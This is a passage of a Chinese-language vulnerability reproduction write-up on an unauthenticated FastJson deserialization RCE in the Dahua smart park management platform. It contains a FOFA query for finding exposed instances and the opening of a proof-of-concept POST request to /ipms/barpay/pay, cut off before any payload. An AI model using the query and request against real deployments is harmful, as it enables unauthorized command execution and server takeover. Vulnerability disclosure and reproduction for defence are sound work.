大华智慧园区综合管理平台 RCE漏洞复现

0x01 产品简介

 “大华智慧园区综合管理平台”是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。

0x02 漏洞概述

 大华智慧园区综合管理平台 /ipms/barpay/pay、deleteFtp、等接口存在FastJson反序列化漏洞，未授权的攻击者可利用此漏洞执行任意命令,获取服务器权限。

0x03 复现环境

FOFA：app="dahua-智慧园区综合管理平台"

0x04 漏洞复现

PoC-1

POST /ipms/barpay/pay HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Typ